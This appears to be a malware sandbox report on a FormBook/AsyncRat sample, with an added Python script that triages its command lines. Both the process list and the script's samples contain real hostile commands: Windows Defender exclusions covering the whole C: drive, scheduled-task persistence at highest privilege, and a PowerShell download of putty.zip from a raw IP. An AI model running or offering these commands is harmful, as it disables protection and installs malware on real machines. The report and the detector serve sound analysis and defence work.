Analysis Overview
SHA256
69811fd3a031d56a72428c7f3f74573b551c2dc9b5fb827fe6740a03eae55f31
Threat Level: Known bad
The file Trojan;MSIL.FormBook.AFO!MTB.zip was found to be: Known bad.
Malicious Activity Summary
AsyncRat
Downloads MZ/PE file
Command and Scripting Interpreter: PowerShell
Blocklisted process makes network request
Checks computer location settings
Uses the VBS compiler for execution
Loads dropped DLL
Executes dropped EXE
Legitimate hosting services abused for malware hosting/C2
Checks installed software on the system
Writes to the Master Boot Record (MBR)
Suspicious use of SetThreadContext
Unsigned PE
Enumerates physical storage devices
Program crash
Suspicious use of SetWindowsHookEx
Suspicious use of FindShellTrayWindow
Checks processor information in registry
Suspicious use of WriteProcessMemory
Suspicious behavior: AddClipboardFormatListener
Creates scheduled task(s)
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Script User-Agent
Suspicious use of SendNotifyMessage
Enumerates system info in registry
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-06-01 15:32
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-01 15:32
Reported
2024-06-01 15:33
Platform
win10v2004-20240508-en
Max time kernel
43s
Max time network
34s
Command Line
Signatures
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Trojan;MSIL.FormBook.AFO!MTB.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Trojan;MSIL.FormBook.AFO!MTB.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Trojan;MSIL.FormBook.AFO!MTB.exe
"C:\Users\Admin\AppData\Local\Temp\Trojan;MSIL.FormBook.AFO!MTB.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4124,i,6166776566165096562,4582328833313060853,262144 --variations-seed-version --mojo-platform-channel-handle=4172 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 23.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-06-01 15:32
Reported
2024-06-01 15:33
Platform
win10v2004-20240426-en
Max time kernel
46s
Max time network
35s
Command Line
Signatures
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Suspicious use of SetWindowsHookEx
Processes
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Пароли Chrome.csv"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | roaming.officeapps.live.com | udp |
| IE | 52.109.76.243:443 | roaming.officeapps.live.com | tcp |
| US | 8.8.8.8:53 | 240.76.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 243.76.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 80.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.117.168.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
Files
memory/5064-0-0x00007FFB10F90000-0x00007FFB10FA0000-memory.dmp
memory/5064-1-0x00007FFB10F90000-0x00007FFB10FA0000-memory.dmp
memory/5064-2-0x00007FFB10F90000-0x00007FFB10FA0000-memory.dmp
memory/5064-3-0x00007FFB10F90000-0x00007FFB10FA0000-memory.dmp
memory/5064-4-0x00007FFB10F90000-0x00007FFB10FA0000-memory.dmp
memory/5064-5-0x00007FFB50FAD000-0x00007FFB50FAE000-memory.dmp
memory/5064-6-0x00007FFB50F10000-0x00007FFB51105000-memory.dmp
memory/5064-9-0x00007FFB50F10000-0x00007FFB51105000-memory.dmp
memory/5064-7-0x00007FFB50F10000-0x00007FFB51105000-memory.dmp
memory/5064-8-0x00007FFB50F10000-0x00007FFB51105000-memory.dmp
memory/5064-12-0x00007FFB50F10000-0x00007FFB51105000-memory.dmp
memory/5064-13-0x00007FFB50F10000-0x00007FFB51105000-memory.dmp
memory/5064-15-0x00007FFB50F10000-0x00007FFB51105000-memory.dmp
memory/5064-14-0x00007FFB50F10000-0x00007FFB51105000-memory.dmp
memory/5064-16-0x00007FFB50F10000-0x00007FFB51105000-memory.dmp
memory/5064-11-0x00007FFB50F10000-0x00007FFB51105000-memory.dmp
memory/5064-10-0x00007FFB0EF30000-0x00007FFB0EF40000-memory.dmp
memory/5064-17-0x00007FFB0EF30000-0x00007FFB0EF40000-memory.dmp
memory/5064-18-0x00007FFB50F10000-0x00007FFB51105000-memory.dmp
memory/5064-35-0x00007FFB50F10000-0x00007FFB51105000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-01 15:32
Reported
2024-06-01 15:33
Platform
win10v2004-20240426-en
Max time kernel
41s
Max time network
47s
Command Line
Signatures
AsyncRat
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\New Text Document.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\volumeinfo.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\55.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\munqk.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\17.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\network.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\maikati.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\Zinker.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\smartsoftsignew.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\ADServices.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\New.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\putty\putty.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\smartsoftsignew.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\smartsoftsignew.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe | N/A |
Uses the VBS compiler for execution
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | iplogger.com | N/A | N/A |
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| File opened for modification | \??\PhysicalDrive0 | C:\Users\Admin\AppData\Local\Temp\a\360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3200 set thread context of 2804 | N/A | C:\Users\Admin\AppData\Local\Temp\a\3.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe |
| PID 4832 set thread context of 3148 | N/A | C:\Users\Admin\AppData\Local\Temp\a\network.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
| PID 4732 set thread context of 3380 | N/A | C:\Users\Admin\AppData\Local\Temp\a\Zinker.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\a\network.exe |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Script User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\New Text Document.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\a\volumeinfo.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\a\360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\munqk.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\17.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\network.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\maikati.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\New Text Document.exe
"C:\Users\Admin\AppData\Local\Temp\New Text Document.exe"
C:\Users\Admin\AppData\Local\Temp\a\volumeinfo.exe
"C:\Users\Admin\AppData\Local\Temp\a\volumeinfo.exe"
C:\Users\Admin\AppData\Local\Temp\a\55.exe
"C:\Users\Admin\AppData\Local\Temp\a\55.exe"
C:\Users\Admin\AppData\Local\Temp\a\3.exe
"C:\Users\Admin\AppData\Local\Temp\a\3.exe"
C:\Users\Admin\AppData\Local\Temp\a\munqk.exe
"C:\Users\Admin\AppData\Local\Temp\a\munqk.exe"
C:\Users\Admin\AppData\Local\Temp\a\17.exe
"C:\Users\Admin\AppData\Local\Temp\a\17.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\'
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2804 -ip 2804
C:\Users\Admin\AppData\Local\Temp\a\network.exe
"C:\Users\Admin\AppData\Local\Temp\a\network.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2804 -s 12
C:\Users\Admin\AppData\Local\Temp\a\maikati.exe
"C:\Users\Admin\AppData\Local\Temp\a\maikati.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
-arguments
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 4832 -ip 4832
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4832 -s 612
C:\Users\Admin\AppData\Local\Temp\a\Zinker.exe
"C:\Users\Admin\AppData\Local\Temp\a\Zinker.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Users\Admin\AppData\Local\Temp\a\smartsoftsignew.exe
"C:\Users\Admin\AppData\Local\Temp\a\smartsoftsignew.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C cd "C:\Users\Admin\AppData\Local\Temp\putty" & "Smartscreen.bat"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object Net.WebClient).DownloadFile('http://94.103.188.126/jerry/putty.zip', 'C:\Users\Admin\AppData\Local\Temp\putty.zip')"
C:\Users\Admin\AppData\Local\Temp\a\ADServices.exe
"C:\Users\Admin\AppData\Local\Temp\a\ADServices.exe"
C:\Users\Admin\AppData\Local\Temp\a\New.exe
"C:\Users\Admin\AppData\Local\Temp\a\New.exe"
C:\Users\Admin\AppData\Local\Temp\a\360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe
"C:\Users\Admin\AppData\Local\Temp\a\360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.com/26uSj6
C:\Windows\SysWOW64\tar.exe
tar -xf putty.zip
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0x100,0x128,0x7ff8520346f8,0x7ff852034708,0x7ff852034718
C:\Users\Admin\AppData\Local\Temp\putty\putty.exe
C:\Users\Admin\AppData\Local\Temp\putty\putty.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2040,6098613852097135989,12193692332369972990,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2012 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2040,6098613852097135989,12193692332369972990,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2264 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2040,6098613852097135989,12193692332369972990,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2832 /prefetch:8
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,6098613852097135989,12193692332369972990,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,6098613852097135989,12193692332369972990,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3392 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH2663\MPGPH2663.exe" /tn "MPGPH2663 HR" /sc HOURLY /rl HIGHEST
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH2663\MPGPH2663.exe" /tn "MPGPH2663 LG" /sc ONLOGON /rl HIGHEST
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,6098613852097135989,12193692332369972990,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4972 /prefetch:1
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\a\New.exe" -Force
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
C:\Users\Admin\AppData\Local\Temp\svchost.exe
"C:\Users\Admin\AppData\Local\Temp\svchost.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
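The process list above contains the whole host-side chain in a handful of command lines: a Defender exclusion for the entire C: drive, a second exclusion for the dropped New.exe, two scheduled tasks running a ProgramData binary at the highest run level, a WebClient download from a bare IP, unsigned .NET framework utilities (vbc.exe, RegAsm.exe, CasPol.exe, jsc.exe) started with no arguments as hollowing targets, and an svchost.exe living in Temp. The following is an added example by the editor, not code from the sandbox or from the report: a small rule set that pulls exactly those signals out of command lines. The rule names, the Finding structure and the extended LOLBin list (msbuild, installutil, regsvcs do not appear on this page) are the editor's assumptions; the sample lines are copied from the process list above.

```python
"""Triage sandbox process command lines for the host-side tradecraft this
report shows: Defender exclusions, schtasks persistence, PowerShell download
cradles, argument-less .NET hosts (SetThreadContext hollowing targets) and
system-binary name masquerading. Added example; rule set is an assumption."""
import re
from dataclasses import dataclass, field

# Constructed sample: command lines copied from the behavioral1 process list.
SAMPLE_CMDLINES = [
    r'"C:\Users\Admin\AppData\Local\Temp\a\3.exe"',
    r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"',
    r"powershell -Command Add-MpPreference -ExclusionPath 'C:\'",
    r'"C:\Windows\system32\cmd.exe" /C cd "C:\Users\Admin\AppData\Local\Temp\putty" & "Smartscreen.bat"',
    r'''powershell -Command "(New-Object Net.WebClient).DownloadFile('http://94.103.188.126/jerry/putty.zip', 'C:\Users\Admin\AppData\Local\Temp\putty.zip')"''',
    r'schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH2663\MPGPH2663.exe" /tn "MPGPH2663 HR" /sc HOURLY /rl HIGHEST',
    r'schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH2663\MPGPH2663.exe" /tn "MPGPH2663 LG" /sc ONLOGON /rl HIGHEST',
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\a\New.exe" -Force',
    r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"',
    r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"',
    r'"C:\Users\Admin\AppData\Local\Temp\svchost.exe"',
]

# .NET utilities commonly used as injection hosts (list extended beyond this page; assumption)
DOTNET_HOSTS = {"vbc", "regasm", "regsvcs", "applaunch", "caspol", "jsc", "msbuild", "installutil"}
SYSTEM_BINARIES = {"svchost", "lsass", "csrss", "wininit", "services", "smss"}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
EXCL_RE = re.compile(r"-Exclusion(Path|Process|Extension)\s+(?:['\"]([^'\"]+)['\"]|(\S+))", re.I)
TASK_OPT_RE = re.compile(r'/(tn|tr|sc|rl|ru)\s+(?:"([^"]*)"|(\S+))', re.I)
URL_RE = re.compile(r"https?://([^/'\"\s]+)[^'\"\s]*", re.I)
IPV4_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")
CRADLE_RE = re.compile(r"downloadfile|downloadstring|invoke-webrequest|\biwr\b|start-bitstransfer", re.I)


@dataclass
class Finding:
    rule: str
    cmdline: str
    detail: dict = field(default_factory=dict)


def split_image(cmdline):
    """Return (image, args): the quoted or first-token image and the rest."""
    s = cmdline.strip()
    if s.startswith('"'):
        end = s.index('"', 1)
        return s[1:end], s[end + 1:].strip()
    head, _, rest = s.partition(" ")
    return head, rest.strip()


def image_name(image):
    """Lower-case basename without the .exe suffix."""
    name = image.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    return name[:-4] if name.endswith(".exe") else name


def triage(cmdline):
    """Run every rule against one command line and return its findings."""
    image, args = split_image(cmdline)
    name = image_name(image)
    is_ps = name in ("powershell", "pwsh")
    found = []
    m = EXCL_RE.search(cmdline)
    if is_ps and "add-mppreference" in cmdline.lower() and m:
        value = m.group(2) or m.group(3)
        found.append(Finding("defender_exclusion", cmdline, {
            "kind": m.group(1).lower(), "value": value,
            # excluding a drive root switches scanning off for everything on it
            "whole_drive": bool(re.fullmatch(r"[A-Za-z]:\\?", value))}))
    if name == "schtasks" and "/create" in args.lower():
        opts = {k.lower(): (q or u) for k, q, u in TASK_OPT_RE.findall(args)}
        found.append(Finding("scheduled_task", cmdline, {
            **opts, "highest_rl": opts.get("rl", "").upper() == "HIGHEST"}))
    if is_ps and CRADLE_RE.search(cmdline):
        for u in URL_RE.finditer(cmdline):
            host = u.group(1).split(":")[0]  # drop an explicit port
            found.append(Finding("download_cradle", cmdline, {
                "url": u.group(0), "host": host, "raw_ip": bool(IPV4_RE.match(host))}))
    if name in DOTNET_HOSTS and not args:
        # a signed .NET utility launched with no arguments does no real work;
        # it is the shell a loader writes its payload into (SetThreadContext)
        found.append(Finding("dotnet_host_no_args", cmdline, {"host": name}))
    if name in SYSTEM_BINARIES and not image.lower().startswith(SYSTEM_DIRS):
        found.append(Finding("masquerading_system_binary", cmdline, {"path": image}))
    return found


def triage_all(cmdlines):
    return [f for c in cmdlines for f in triage(c)]


def summarize(findings):
    counts = {}
    for f in findings:
        counts[f.rule] = counts.get(f.rule, 0) + 1
    return counts


if __name__ == "__main__":
    for f in triage_all(SAMPLE_CMDLINES):
        print(f"{f.rule:28} {f.detail}")
```

Run against the sample it reports two Defender exclusions (the first covering the whole drive), two HIGHEST-level tasks named "MPGPH2663 HR" and "MPGPH2663 LG", one download from a raw IP, three argument-less .NET hosts and the Temp svchost.exe; a genuine `C:\Windows\System32\svchost.exe -k netsvcs` produces nothing, which is the check worth keeping in the test.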
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | urlhaus.abuse.ch | udp |
| US | 151.101.2.49:443 | urlhaus.abuse.ch | tcp |
| RU | 147.45.47.70:80 | 147.45.47.70 | tcp |
